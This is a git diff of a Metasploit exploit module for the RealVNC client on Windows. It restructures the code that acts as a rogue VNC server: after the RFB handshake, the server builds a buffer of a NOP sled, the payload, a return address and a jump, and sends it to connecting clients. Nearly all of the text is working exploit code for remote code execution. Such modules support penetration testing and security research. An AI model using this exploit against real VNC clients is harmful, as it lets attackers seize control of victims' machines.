diff --git a/modules/exploits/windows/vnc/realvnc_client.rb b/modules/exploits/windows/vnc/realvnc_client.rb
index d5ab68a95c..c117e5741a 100644
--- a/modules/exploits/windows/vnc/realvnc_client.rb
+++ b/modules/exploits/windows/vnc/realvnc_client.rb
@@ -47,19 +47,20 @@ class Exploits::Windows::Vnc::Realvnc_Client < Exploit::Remote
 	end
 
 	def on_client_connect(client)
-		return if ((p = regenerate_payload(client)) == nil)	
-
-		filler = make_nops(993 - payload.encoded.length)
 
 		rfb = "RFB 003.003\n"
 
+		client.put(rfb)
+	end
+
+	def on_client_data(client)
+		return if ((p = regenerate_payload(client)) == nil)
+
+		filler = make_nops(993 - payload.encoded.length)
+
 		sploit =  "\x00\x00\x00\x00\x00\x00\x04\x06" + filler + payload.encoded
 		sploit << [target.ret].pack('V') + make_nops(10) + [0xe8, -457].pack('CV')
-		sploit << Rex::Text.rand_text_english(200)
-
-		client.put(rfb)
-
-		on_client_data(16)
+		sploit << rand_text_english(200)
 
 		print_status("Sending #{sploit.length} bytes to #{client.getpeername}:#{client.peerport}...")
 		client.put(sploit)